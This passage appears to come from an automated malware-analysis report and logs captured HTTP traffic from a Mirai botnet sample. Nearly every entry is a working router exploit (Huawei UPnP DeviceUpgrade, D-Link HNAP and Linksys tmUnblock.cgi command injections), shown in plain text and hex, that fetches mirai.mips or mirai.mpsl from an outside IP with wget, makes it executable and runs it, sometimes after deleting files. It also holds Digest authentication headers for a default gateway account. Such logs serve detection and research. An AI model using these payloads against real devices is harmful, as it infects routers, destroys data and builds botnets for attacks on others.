2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POSTData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
